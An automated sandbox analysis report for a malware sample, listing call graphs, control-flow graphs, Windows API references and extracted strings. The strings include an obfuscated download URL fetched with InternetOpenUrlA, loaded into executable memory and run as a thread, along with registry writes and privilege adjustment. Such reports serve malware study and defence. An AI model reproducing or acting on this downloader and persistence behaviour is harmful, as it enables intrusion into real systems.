1000bd08 45 API calls 42808->42809 42810 10008d40 42809->42810 42811 10007e76 ReadFile 42810->42811 42812 10008d5f 42811->42812 42812->42797 42813 1000bfdf 40 API calls 42812->42813 42814 10008dff 42812->42814 42813->42812 42815 1000be5b __fassign 40 API calls 42814->42815 42816 10008e0e SystemTimeToFileTime LocalFileTimeToFileTime 42815->42816 42816->42797 42819 1000f324 42818->42819 42820 1000f33a RtlEnterCriticalSection 42818->42820 42821 1000f7d2 __lock 38 API calls 42819->42821 42820->42728 42822 1000f32d 42821->42822 42822->42728 42824 10012dd5 __stbuf 38 API calls 42823->42824 42825 1000f3c3 42824->42825 42826 10012d7f __stbuf 38 API calls 42825->42826 42827 1000f3c9 __stbuf 42826->42827 42828 1000f416 42827->42828 42829 10010003 __malloc_crt 38 API calls 42827->42829 42828->42731 42829->42828 42831 1000add4 _LocaleUpdate::_LocaleUpdate 40 API calls 42830->42831 42832 1000d0d2 42831->42832 42833 1000d0d6 42832->42833 42836 10012dd5 __stbuf 38 API calls 42832->42836 42845 1000d10d __output_l __aulldvrm _strlen 42832->42845 42834 1000ddf3 __cftoa_l 38 API calls 42833->42834 42835 1000d0db 42834->42835 42837 1000dda1 __cftoa_l 11 API calls 42835->42837 42836->42845 42838 1000d0e6 42837->42838 42839 1000ad41 __cftof_l 5 API calls 42838->42839 42840 1000dbf2 42839->42840 42840->42733 42841 1000edcb __isleadbyte_l 40 API calls 42841->42845 42842 1000b491 _free 38 API calls 42842->42845 42843 10012f50 42 API calls __cftof 42843->42845 42844 10010003 __malloc_crt 38 API calls 42844->42845 42845->42833 42845->42838 42845->42841 42845->42842 42845->42843 42845->42844 42846 1000cff7 61 API calls _write_string 42845->42846 42847 1000cfc4 61 API calls __output_l 42845->42847 42846->42845 42847->42845 42849 1000e990 __getptd_noexit 38 API calls 42848->42849 42850 1000b803 42849->42850 42851 1000dda1 11 API calls __cftoa_l 42850->42851 42851->42729 42852->42735 42853->42729 42855 1000ea09 __getptd 38 API calls 42854->42855 42856 1000c210 42855->42856 42857 1000ad41 __cftof_l 5 API calls 42856->42857 42858 1000c2a8 42857->42858 42858->42740 42859->42746 42860->42746 42862 100092f2 42861->42862 42863 100092f9 42861->42863 42864 10008a54 38 API calls 42862->42864 42865 1000931d 42863->42865 42867 10008487 SetFilePointer ReadFile 42863->42867 42887 10009307 42863->42887 42864->42863 42868 10009338 42865->42868 42871 100084bc SetFilePointer ReadFile 42865->42871 42866 1000ad41 __cftof_l 5 API calls 42870 10009600 42866->42870 42867->42865 42869 10008bda 51 API calls 42868->42869 42872 1000934c 42869->42872 42870->42752 42871->42865 42874 1000935b 42872->42874 42876 10009388 42872->42876 42873 1000be5b __fassign 40 API calls 42878 100093b9 42873->42878 42875 1000916f 44 API calls 42874->42875 42875->42887 42876->42873 42877 10009494 42879 1000ad50 _sprintf 63 API calls 42877->42879 42878->42877 42882 100093c4 _memset 42878->42882 42880 100094ad 42879->42880 42881 1000916f 44 API calls 42880->42881 42883 100094bc CreateFileA 42881->42883 42885 1000b91d _strcat_s 38 API calls 42882->42885 42886 10009521 42883->42886 42883->42887 42890 1000942c 42885->42890 42888 100086d0 40 API calls 42886->42888 42887->42866 42889 1000952e 42888->42889 42891 1000bd08 45 API calls 42889->42891 42898 10009541 42889->42898 42893 1000ad50 _sprintf 63 API calls 42890->42893 42891->42898 42892 10008829 7 API calls 42892->42898 42894 100094d5 42893->42894 42896 1000916f 44 API calls 42894->42896 42895 100095a6 42897 10008a54 38 API calls 42895->42897 42896->42883 42900 100095b7 42897->42900 42898->42892 42898->42895 42899 1000957a WriteFile 42898->42899 42899->42895 42899->42898 42901 100095c0 SetFileTime 42900->42901 42902 100095e1 CloseHandle 42900->42902 42901->42902 42902->42887 42904 10002e62 42903->42904 42906 10002d60 _memset 42903->42906 42905 1000ad41 __cftof_l 5 API calls 42904->42905 42907 10002e6d 42905->42907 42908 10002d8b Sleep 42906->42908 42907->42402 42909 10002da1 42908->42909 42910 10002e22 WriteFile 42909->42910 42911 10002dc8 42909->42911 42912 10002e48 FlushFileBuffers 42910->42912 42913 1000b4cb _malloc 38 API calls 42911->42913 42914 10002e54 CloseHandle 42912->42914 42915 10002dd3 _memset 42913->42915 42914->42904 42915->42914 42916 10002e00 WriteFile 42915->42916 42917 1000b491 _free 38 API calls 42916->42917 42918 10002e1f 42917->42918 42918->42912 42920 1000ae6e 42919->42920 42921 1000ae89 42920->42921 42922 1000ae9e 42920->42922 42931 1000ae73 _strlen 42920->42931 42923 1000ddf3 __cftoa_l 38 API calls 42921->42923 42940 1000add4 42922->42940 42925 1000ae8e 42923->42925 42939 1000dda1 11 API calls __cftoa_l 42925->42939 42928 1000aeb4 42928->42931 42934 1000aeff GetLastError 42928->42934 42929 1000af6b 42930 1000af79 MultiByteToWideChar 42929->42930 42929->42931 42930->42931 42932 1000af8d 42930->42932 42931->42406 42933 1000ddf3 __cftoa_l 38 API calls 42932->42933 42933->42931 42935 1000af0a 42934->42935 42938 1000af3d 42934->42938 42935->42938 42948 1000edcb 40 API calls _LocaleUpdate::_LocaleUpdate 42935->42948 42936 1000ddf3 __cftoa_l 38 API calls 42936->42931 42938->42931 42938->42936 42939->42931 42941 1000ade7 42940->42941 42947 1000ae34 42940->42947 42942 1000ea09 __getptd 38 API calls 42941->42942 42943 1000adec 42942->42943 42944 1000ae14 42943->42944 42945 1000e7e0 _LocaleUpdate::_LocaleUpdate 38 API calls 42943->42945 42946 1000e05f __setmbcp 40 API calls 42944->42946 42944->42947 42945->42944 42946->42947 42947->42928 42947->42929 42948->42935 42949->42412 42951 10001799 42950->42951 42952 1000179d LookupPrivilegeValueA 42950->42952 42955 1000ad41 __cftof_l 5 API calls 42951->42955 42953 100017b2 CloseHandle 42952->42953 42954 100017bd AdjustTokenPrivileges 42952->42954 42953->42951 42954->42953 42956 100017f0 42954->42956 42957 100017fc 42955->42957 42956->42951 42958 100017fe CreateToolhelp32Snapshot 42957->42958 42959 1000cce0 _memset 42958->42959 42960 1000183b Process32FirstW 42959->42960 42961 1000187d 42960->42961 42962 10001881 CloseHandle 42961->42962 42963 10001858 lstrcmpiW 42961->42963 42966 1000ad41 __cftof_l 5 API calls 42962->42966 42963->42962 42965 1000186f Process32NextW 42963->42965 42965->42961 42967 1000189e 42966->42967 42967->42421 42967->42422 42968->42442 42969->42453 42970->42461 42971->42469 42972->42477 42973->42485 42974->42493 42975->42501 42976->42509 42977->42517 42978->42525 42979->42533 42980->42541 42981->42555 42982->42458 42983->42466 42984->42470 42985->42480 42986->42489 42987->42495 42988->42505 42989->42510 42990->42519 42991->42529 42992->42534 42993->42544 42994->42553 42995->42565 42996->42465 42997->42473 42998->42479 42999->42488 43000->42494 43001->42504 43002->42513 43003->42518 43004->42528 43005->42537 43006->42543 43007->42552 43008->42559 43009->42571 43010->42472 43011->42478 43012->42487 43013->42497 43014->42503 43015->42512 43016->42521 43017->42527 43018->42536 43019->42542 43020->42551 43021->42561 43022->42567 43023->42575 43025 100031d4 GetModuleFileNameA 43024->43025 43025->42584 43026->42585 43027->42587 43029 1000bb7b __setmbcp 43028->43029 43043 1000f7d2 43029->43043 43033 1000bca9 __setmbcp 43033->42597 43035 1000bc91 43055 1000ba57 43035->43055 43037 1000bc2c 43050 1000bc9a 43037->43050 43041 1000e859 RtlEncodePointer ___crtMessageBoxW 43042 1000bb82 43041->43042 43042->43037 43042->43041 43044 1000f7e7 43043->43044 43045 1000f7fa RtlEnterCriticalSection 43043->43045 43046 1000f710 __mtinitlocknum 37 API calls 43044->43046 43045->43042 43047 1000f7ed 43046->43047 43047->43045 43048 1000bcea __amsg_exit 37 API calls 43047->43048 43049 1000f7f9 43048->43049 43049->43045 43051 1000bca0 43050->43051 43053 1000bc7a 43050->43053 43052 1000f6f9 _doexit RtlLeaveCriticalSection 43051->43052 43052->43053 43053->43033 43054 1000f6f9 RtlLeaveCriticalSection 43053->43054 43054->43035 43056 1000ba2c ___crtCorExitProcess GetModuleHandleW GetProcAddress 43055->43056 43057 1000ba64 ExitProcess 43056->43057
                                  APIs
                                  • GetNativeSystemInfo.KERNEL32(?), ref: 036404A2
                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 036404D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocInfoNativeSystemVirtual
                                  • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                  • API String ID: 2032221330-2899676511
                                  • Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                  • Instruction ID: 48401cde431cbaf841c771a45f396bfdbcc1a88e520fd2d92801c10ac27e2644
                                  • Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                  • Instruction Fuzzy Hash: 4A626871A093959FE724CF24C940BABFBE5BF84304F08492DEA898B351E770D949CB56

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 422 420710-42088a call 420f00 call 420f30 * 3 432 420895-420899 422->432 433 42089b-4208ad 432->433 434 4208af-4209aa call 420f30 432->434 433->432 439 4209b5-4209b9 434->439 440 4209d5-420a70 ShellExecuteA call 420f30 * 2 CreateThread call 420f30 439->440 441 4209bb-4209d3 439->441 450 420a76 440->450 451 420e58-420e75 440->451 441->439 452 420a7d-420a84 450->452 454 420ab0-420ab7 452->454 455 420a86-420a97 452->455 454->451 456 420abd-420ac4 454->456 459 420a9b-420aa8 455->459 460 420a99 455->460 456->451 458 420aca-420d09 call 420f30 * 2 VirtualAlloc call 420f30 call 421060 call 420f30 * 4 456->458 483 420d14-420d18 458->483 462 420aaa 459->462 463 420aae 459->463 460->454 462->454 463->452 484 420d1a-420d2c 483->484 485 420d2e-420d5f VirtualAlloc 483->485 484->483 487 420d66-420db9 InternetOpenA InternetOpenUrlA 485->487 489 420dc0-420dc4 487->489 490 420dc6-420df2 InternetReadFile 489->490 491 420df4-420dfd 489->491 490->489 491->487 492 420e03-420e51 call 4210d0 CreateThread 491->492 492->451
                                  APIs
                                  • ShellExecuteA.SHELL32(00000000,rshq,xk>33wixperkyekiCperkAgpewwmg1~l1gr,00000000,00000000,00000001), ref: 004209E8
                                  • CreateThread.KERNEL32(00000000,00000000,?,00016B48,00000000,00000000), ref: 00420A34
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000004), ref: 00420B86
                                  • VirtualAlloc.KERNEL32(00000000,00400000,00001000,00000040), ref: 00420D46
                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00420D70
                                  • InternetOpenUrlA.WININET(?,lxxt>33{if2eh<;l=6n2gsq383psrk2fqt,00000000,00000000,80000000,00000000), ref: 00420D92
                                  • InternetReadFile.WININET(?,00000000,00002000,00000000), ref: 00420DDA
                                  • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00420E3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Internet$AllocCreateOpenThreadVirtual$ExecuteFileReadShell
                                  • String ID: yD!$"$#$Shell32$kernelbase.dll$lxxt>33{if2eh<;l=6n2gsq383psrk2fqt$msvcrt$rshq$wininet$xk>33wixperkyekiCperkAgpewwmg1~l1gr
                                  • API String ID: 2427132717-3945075071
                                  • Opcode ID: 69266da5197d4156bfa68b13fef2e2114937dfde714d3901c17851fe9ed831eb
                                  • Instruction ID: b9ef46bf813e0610e8d4c415594b793da0c7f154e6098c1bc68ff7569547f3c3
                                  • Opcode Fuzzy Hash: 69266da5197d4156bfa68b13fef2e2114937dfde714d3901c17851fe9ed831eb
                                  • Instruction Fuzzy Hash: 39324E70D08398DEEB21CBA8D845BDDBFB56F15708F5441C9E1487B282C7BA1A84CF66

                                  Control-flow Graph

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000EAD0,ED2F953D), ref: 0040EB63
                                  • GetClassInfoW.USER32(?,#32770,?), ref: 0040EBC2
                                  • InitCommonControlsEx.COMCTL32(?), ref: 0040EBEF
                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040EC16
                                    • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ClassCommonControlsExceptionFilterGdiplusInfoInitStartupUnhandled_malloc
                                  • String ID: #32770
                                  • API String ID: 3338494789-463685578
                                  • Opcode ID: 451ebffd18cfcb30c8332fa409f70244c359509bb77b1719bd2b1b0b7cee76ff
                                  • Instruction ID: f5d5fc1f3776b5d2185d5017cf2985b55b0a1cf5fb9be8e53022bb48848d8530
                                  • Opcode Fuzzy Hash: 451ebffd18cfcb30c8332fa409f70244c359509bb77b1719bd2b1b0b7cee76ff
                                  • Instruction Fuzzy Hash: BC41B6B15083429BE704EF65DC49B5BBBE5FB88704F004A3EF549932D1EBB9D4088B96

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 940 10008bda-10008c06 941 10009159 940->941 942 10008c0c-10008c11 940->942 944 1000915e-1000916c call 1000ad41 941->944 942->941 943 10008c17-10008c1b 942->943 945 10008c25-10008c2f 943->945 946 10008c1d-10008c22 call 10008a54 943->946 950 10008c31-10008c34 945->950 951 10008c45-10008c48 945->951 946->945 952 10008c4a-10008c8d 950->952 955 10008c36-10008c3c 950->955 951->952 953 10008c8f-10008c94 951->953 956 10008c3e-10008c40 952->956 957 10008ca6-10008cab 953->957 958 10008c96-10008ca3 call 10008487 953->958 955->956 956->944 960 10008cca-10008d00 call 10008264 call 1000850d 957->960 961 10008cad-10008cc8 call 100084bc 957->961 958->957 968 10008d05-10008d0a 960->968 961->960 969 10008d16-10008d29 call 10007e17 968->969 970 10008d0c-10008d11 968->970 973 10008d35-10008d68 call 1000bd08 call 10007e76 969->973 974 10008d2b-10008d30 969->974 970->944 979 10008d78-10008d7f 973->979 980 10008d6a-10008d76 call 1000b8df 973->980 974->944 982 10008d81-10008d92 979->982 980->974 982->982 984 10008d94 982->984 985 10008d9a-10008d9e 984->985 986 10008da0-10008da4 985->986 987 10008dab-10008dad 985->987 986->987 988 10008da6-10008da9 986->988 989 10008db3-10008db4 987->989 990 10008daf-10008db1 987->990 988->985 989->985 990->989 991 10008db6-10008dc5 call 1000bfdf 990->991 994 10008dc7-10008dd6 call 1000bfdf 991->994 995 10008dfa-10008dfd 991->995 994->995 998 10008dd8-10008de7 call 1000bfdf 994->998 995->985 998->995 1001 10008de9-10008df8 call 1000bfdf 998->1001 1001->995 1004 10008dff-10008e49 call 1000be5b 1001->1004 1007 10008e5a-10008e86 1004->1007 1008 10008e4b-10008e4e 1004->1008 1010 10008e8c-10008e95 1007->1010 1008->1007 1009 10008e50-10008e53 1008->1009 1009->1007 1011 10008e55-10008e58 1009->1011 1012 10008ea1-10008ea8 1010->1012 1013 10008e97 1010->1013 1011->1007 1011->1010 1014 10008eb1-10008eb8 1012->1014 1015 10008eaa 1012->1015 1013->1012 1016 10008ec1-10008ec3 1014->1016 1017 10008eba 1014->1017 1015->1014 1018 10008ec5 1016->1018 1019 10008ecc-10008ed3 1016->1019 1017->1016 1018->1019 1020 10008ed5 1019->1020 1021 10008edc-10008fd9 SystemTimeToFileTime LocalFileTimeToFileTime 1019->1021 1020->1021 1022 10009120 1021->1022 1023 10008fdf 1021->1023 1025 10009126-10009128 1022->1025 1024 10008fe5-10009010 1023->1024 1026 10009012-10009024 1024->1026 1027 1000902b-10009051 1024->1027 1028 10009131-1000914e 1025->1028 1029 1000912a-10009130 call 1000b8df 1025->1029 1026->1024 1030 10009026 1026->1030 1032 10009053-10009094 call 10005d90 1027->1032 1033 10009096 1027->1033 1028->941 1029->1028 1030->1025 1036 1000909c-100090a3 1032->1036 1033->1036 1038 100090e0-100090e7 1036->1038 1039 100090a5-100090da call 10005d90 1036->1039 1038->1025 1041 100090e9-1000911a call 10005d90 1038->1041 1039->1038 1041->1022
                                  APIs
                                    • Part of subcall function 10007E17: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,10007FCD,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007E43
                                  • __fassign.LIBCMT ref: 10008E09
                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 10008F6E
                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 10008F9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FileTime$LocalPointerSystem__fassign
                                  • String ID:
                                  • API String ID: 3768451866-0
                                  • Opcode ID: 40e32fb4b8a00f69b7b1568f7fad5f0b1312cb9daff528d9d1dbc7183ed708c9
                                  • Instruction ID: 557576cbc3803644095bf150e3d73ac2e181a1a26de8671f3226a8038d31e2d8
                                  • Opcode Fuzzy Hash: 40e32fb4b8a00f69b7b1568f7fad5f0b1312cb9daff528d9d1dbc7183ed708c9
                                  • Instruction Fuzzy Hash: 56F1E171A046699BEB64CF24C8847D9BBF0FF18380F1046EAE899D7285D735AB85CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 100039a3-10003b44 call 10010ab0 call 1000cce0 5 10003b46-10003b59 0->5 5->5 6 10003b5b-10003c9d Sleep call 1000cce0 5->6 9 10003c9f-10003cb2 6->9 9->9 10 10003cb4-10003dee Sleep call 1000cce0 9->10 13 10003df0-10003e03 10->13 13->13 14 10003e05-10003e49 call 1000b9db call 1000b8ac call 1000cce0 call 1000b8be 13->14 23 10003e72-10003f0d call 1000cce0 wsprintfA call 1000cce0 14->23 24 10003e4b-10003e70 call 1000b8be 14->24 32 10003f0f-10003f20 23->32 24->23 32->32 33 10003f22-10003f7a Sleep call 1000cce0 wsprintfA 32->33 39 10003f7b-10003f81 33->39 39->39 40 10003f83-10003ffe call 1000cce0 wsprintfA call 1000cce0 39->40 45 10004000-10004011 40->45 45->45 46 10004013-10004087 Sleep call 1000cce0 wsprintfA call 1000cce0 45->46 51 10004089-1000409a 46->51 51->51 52 1000409c-1000410b Sleep call 1000cce0 wsprintfA call 1000cce0 51->52 57 1000410d-1000411e 52->57 57->57 58 10004120-10004132 57->58 59 10004137-10004176 call 100028b9 Sleep 58->59 62 10004178-100041b3 call 100028b9 Sleep 59->62 65 100041b5-100041f0 call 100028b9 Sleep 62->65 68 100041f2-10004219 call 1000b9db call 1000b8ac call 1000cce0 65->68 75 1000421b-10004237 call 1000b8be 68->75 78 10004239-10004487 call 1000cce0 * 2 call 100059cb call 100059a5 call 100059cb * 4 call 1000a063 call 10002e6f Sleep * 2 call 1000cce0 call 1000afbd call 1000cce0 * 2 call 1000b91d FindWindowExA 75->78 111 10004705-10004729 call 1000cce0 78->111 112 1000448d-10004495 call 100018ea 78->112 117 1000472b-10004730 111->117 118 100044b6-100044b9 112->118 119 10004497-100044b1 call 10002388 Sleep 112->119 117->117 122 10004732-1000473b 117->122 120 10004699-10004700 GlobalAddAtomA 118->120 121 100044bf-1000463f call 1000356a 118->121 119->120 152 10004c13-10004c2e Sleep call 100031c7 Sleep call 1000bcaf 120->152 138 10004641-10004658 Sleep call 1000356a 121->138 139 1000465b-10004689 call 10002887 call 100036ed 121->139 124 1000473c-10004742 122->124 124->124 127 10004744-1000475b 124->127 129 1000475c-10004762 127->129 129->129 131 10004764-10004771 129->131 134 10004772-10004778 131->134 134->134 136 1000477a-100047a6 call 1000cce0 134->136 146 100047a7-100047ad 136->146 138->139 139->120 156 1000468b-10004698 call 10001144 139->156 146->146 148 100047af-100047be 146->148 151 100047bf-100047c5 148->151 151->151 155 100047c7-100047d4 151->155 166 10004c33-10004c50 RegOpenKeyExA 152->166 159 100047d5-100047db 155->159 156->120 159->159 161 100047dd-10004809 call 1000cce0 159->161 167 1000480a-10004810 161->167 168 10004c52-10004c59 166->168 169 10004c95 166->169 167->167 170 10004812-10004821 167->170 171 10004c5c-10004c61 168->171 173 10004c97-10004ca5 Sleep 169->173 172 10004822-10004828 170->172 171->171 174 10004c63-10004c8e RegSetValueExA RegCloseKey 171->174 172->172 175 1000482a-10004839 172->175 176 10004b3b-10004bd2 call 1000cce0 LoadLibraryA call 1000cce0 GetProcAddress 173->176 177 10004cab-10004cb9 call 10002388 173->177 174->169 179 10004c90-10004c93 174->179 180 1000483a-10004840 175->180 176->152 189 10004bd4-10004c11 call 1000cce0 ShellExecuteA 176->189 177->176 179->173 180->180 183 10004842-10004852 180->183 186 10004853-10004859 183->186 186->186 188 1000485b-1000486b 186->188 190 1000486c-10004872 188->190 189->152 190->190 192 10004874-10004882 190->192 194 10004883-10004889 192->194 194->194 195 1000488b-1000489b 194->195 196 1000489c-100048a2 195->196 196->196 197 100048a4-100048b4 196->197 198 100048b5-100048bb 197->198 198->198 199 100048bd-100048cc 198->199 200 100048cd-100048d3 199->200 200->200 201 100048d5-100048e3 200->201 202 100048e4-100048ea 201->202 202->202 203 100048ec-100048fc 202->203 204 100048fd-10004903 203->204 204->204 205 10004905-10004914 204->205 206 10004915-1000491b 205->206 206->206 207 1000491d-1000492d 206->207 208 1000492f-10004934 207->208 208->208 209 10004936-1000493f 208->209 210 10004940-10004946 209->210 210->210 211 10004948-1000495f 210->211 212 10004960-10004966 211->212 212->212 213 10004968-100049d8 call 1000cce0 call 1000afbd call 1000cce0 212->213 220 100049d9-100049e2 213->220 220->220 221 100049e4-100049f3 220->221 222 100049f6-100049ff 221->222 222->222 223 10004a01-10004a12 222->223 224 10004a14-10004a1c 223->224 224->224 225 10004a1e-10004a27 224->225 226 10004a2a-10004a33 225->226 226->226 227 10004a35-10004abf call 1000cce0 * 2 call 1000b91d FindWindowExA 226->227 227->166 234 10004ac5-10004af9 call 10001030 Sleep 227->234 238 10004b39 234->238 239 10004afb-10004b1b 234->239 238->176 241 10004b33 239->241 242 10004b1d-10004b23 239->242 241->238 242->241 243 10004b25-10004b2f 242->243 243->241
                                  APIs
                                  • _memset.LIBCMT ref: 10003B3C
                                  • Sleep.KERNEL32(00000001), ref: 10003B63
                                  • _memset.LIBCMT ref: 10003C95
                                  • Sleep.KERNEL32(00000001), ref: 10003CB6
                                  • _memset.LIBCMT ref: 10003DE6
                                  • __time64.LIBCMT ref: 10003E06
                                  • _memset.LIBCMT ref: 10003E29
                                  • _rand.LIBCMT ref: 10003E31
                                  • _rand.LIBCMT ref: 10003E4B
                                  • _memset.LIBCMT ref: 10003EC9
                                  • wsprintfA.USER32 ref: 10003EEE
                                  • _memset.LIBCMT ref: 10003F05
                                  • Sleep.KERNEL32(00000001), ref: 10003F36
                                  • _memset.LIBCMT ref: 10003F49
                                  • wsprintfA.USER32 ref: 10003F66
                                  • _memset.LIBCMT ref: 10003FB5
                                  • wsprintfA.USER32 ref: 10003FDB
                                  • _memset.LIBCMT ref: 10003FF6
                                  • Sleep.KERNEL32(00000001), ref: 10004015
                                  • _memset.LIBCMT ref: 10004047
                                  • wsprintfA.USER32 ref: 10004068
                                  • _memset.LIBCMT ref: 1000407F
                                  • Sleep.KERNEL32(00000001), ref: 1000409E
                                  • _memset.LIBCMT ref: 100040CB
                                  • wsprintfA.USER32 ref: 100040EC
                                  • _memset.LIBCMT ref: 10004103
                                    • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002908
                                    • Part of subcall function 100028B9: _memset.LIBCMT ref: 1000291A
                                    • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002929
                                  • Sleep.KERNEL32(000003F2), ref: 1000416B
                                  • Sleep.KERNEL32(000003F2), ref: 100041A8
                                  • Sleep.KERNEL32(000003F2), ref: 100041E5
                                  • __time64.LIBCMT ref: 100041F3
                                  • _memset.LIBCMT ref: 10004211
                                  • _rand.LIBCMT ref: 1000421B
                                  • _memset.LIBCMT ref: 1000424A
                                  • _memset.LIBCMT ref: 100042A8
                                    • Part of subcall function 1000A063: __EH_prolog3_GS.LIBCMT ref: 1000A06D
                                    • Part of subcall function 1000A063: wsprintfA.USER32 ref: 1000A0FC
                                    • Part of subcall function 1000A063: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10017380,000000FF), ref: 1000A435
                                    • Part of subcall function 10002E6F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002E8B
                                    • Part of subcall function 10002E6F: GetFileSize.KERNEL32(00000000,00000000), ref: 10002E96
                                    • Part of subcall function 10002E6F: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002EB1
                                  • Sleep.KERNEL32(00000001), ref: 100043C8
                                  • Sleep.KERNEL32(00000320), ref: 100043CF
                                  • _memset.LIBCMT ref: 100043E9
                                  • _mbstowcs.LIBCMT ref: 10004406
                                    • Part of subcall function 1000AFBD: __mbstowcs_l_helper.LIBCMT ref: 1000AFDD
                                  • _memset.LIBCMT ref: 10004427
                                  • _memset.LIBCMT ref: 1000444E
                                  • _strcat_s.LIBCMT ref: 1000446B
                                  • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 1000447E
                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 100044AB
                                  • GlobalAddAtomA.KERNEL32(?), ref: 100046A1
                                  • _memset.LIBCMT ref: 1000471A
                                  • _memset.LIBCMT ref: 10004797
                                  • _memset.LIBCMT ref: 100047FA
                                    • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                    • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                    • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001BF8
                                    • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                    • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                    • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001E90
                                    • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                    • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                    • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10002128
                                    • Part of subcall function 10002388: __EH_prolog3_GS.LIBCMT ref: 10002392
                                    • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023D4
                                    • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023F4
                                    • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 10002411
                                    • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 1000242E
                                  • _memset.LIBCMT ref: 10004B66
                                  • LoadLibraryA.KERNEL32(?,?,00000000,000000F3), ref: 10004B76
                                  • _memset.LIBCMT ref: 10004BB7
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 10004BC8
                                  • _memset.LIBCMT ref: 10004BF4
                                  • ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000005,?,00000000,000000FA,?,?,?,?,00000000,000000F1), ref: 10004C11
